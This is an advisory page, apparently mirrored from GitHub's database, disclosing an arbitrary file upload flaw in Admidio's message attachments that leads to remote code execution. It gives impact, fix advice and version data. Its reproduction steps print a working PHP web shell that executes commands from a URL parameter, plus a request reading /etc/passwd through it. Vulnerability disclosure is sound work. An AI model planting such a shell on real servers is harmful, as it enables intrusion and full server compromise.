Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1nODcyLWp3d3Itdmdnbc4AA-MW
Admidio Vulnerable to RCE via Arbitrary File Upload in Message Attachment
Description:
Remote Code Execution Vulnerability has been identified in the Message module of the Admidio Application, where it is possible to upload a PHP file in the attachment. The uploaded file can be accessed publicly through the URL {admidio_base_url}/adm_my_files/messages_attachments/{file_name}.
The vulnerability is caused due to the lack of file extension verification, allowing malicious files to be uploaded to the server and public availability of the uploaded file.
An attacker can upload a PHP web shell that executes OS commands on the server, compromising the application server.
Note: I am using the docker-compose.yaml file from https://github.com/Admidio/admidio/blob/master/README-Docker.md#docker-compose-usage official documentation.
Impact:
An attacker can exploit this flaw to upload a PHP web shell, which can be used to execute arbitrary commands on the server. This can lead to a complete compromise of the application server, allowing the attacker to:
- Execute arbitrary code or commands.
- Access, modify, or delete sensitive data.
- Install malicious software or scripts.
- Gain further access to internal networks.
- Disrupt services and applications hosted on the server.
Recommendation:
- Implement strict file extension verification to ensure that only allowed file types (e.g., images, documents) can be uploaded.
- Reject any file upload with disallowed or suspicious extensions such as .php, .phtml, .exe, etc.
Steps to Reproduce:
- As a member user, go to write an email message.
- Upload a PHP file in the Attachment, containing the following content:
<?php
$command = isset($_GET['command']) ? $_GET['command'] : '';
$output = [];
$return_var = 0;
exec($command, $output, $return_var);
echo '<h1>Exploiting RCE</h1>';
echo 'Command: '.$command;
echo '\n<pre>';
echo implode("\n", $output);
echo '</pre>';
?>
- Send the email.
- In the message history go to the sent message.
- Download the file, to get the uploaded file name.
- Go to the following URL:
{admidio_base_url}/adm_my_files/messages_attachments/{file_name}?command=cat+/etc/passwd - The server's passwd file would be returned in the response.
Proof Of Concept:
Figure 1: Code of messages_send.php, not having file extension verification.
Figure 2: Uploading Webshell as attachment.
Figure 3: Download the uploaded file to get the uploaded file name.
Figure 4: Uploaded File name.
Figure 5: RCE via web shell.
Figure 6: RCE via Webshell.
Permalink: https://github.com/advisories/GHSA-g872-jwwr-vggmJSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nODcyLWp3d3Itdmdnbc4AA-MW
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: 6 months ago
Updated: 5 months ago
CVSS Score: 9.1
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
EPSS Percentage: 0.00043
EPSS Percentile: 0.10511
Identifiers: GHSA-g872-jwwr-vggm, CVE-2024-38529
References:
- https://github.com/Admidio/admidio/security/advisories/GHSA-g872-jwwr-vggm
- https://nvd.nist.gov/vuln/detail/CVE-2024-38529
- https://github.com/Admidio/admidio/commit/3b1cc1cda05747edebe15f2825b79bc5a673d94c
- https://github.com/advisories/GHSA-g872-jwwr-vggm
Blast Radius: 0.0
Affected Packages
packagist:admidio/admidio
Dependent packages: 1Dependent repositories: 1
Downloads: 17 total
Affected Version Ranges: < 4.3.10
Fixed in: 4.3.10
All affected versions: 4.1.0, 4.1.3, 4.2.0, 4.2.1, 4.2.2, 4.2.3, 4.2.4, 4.2.5, 4.2.6, 4.2.7, 4.2.8, 4.2.9, 4.2.10, 4.2.11, 4.2.12, 4.2.13, 4.2.14, 4.3.0, 4.3.1, 4.3.2, 4.3.3, 4.3.4, 4.3.5, 4.3.6, 4.3.7, 4.3.8, 4.3.9
All unaffected versions: 4.3.10, 4.3.11, 4.3.12, 4.3.13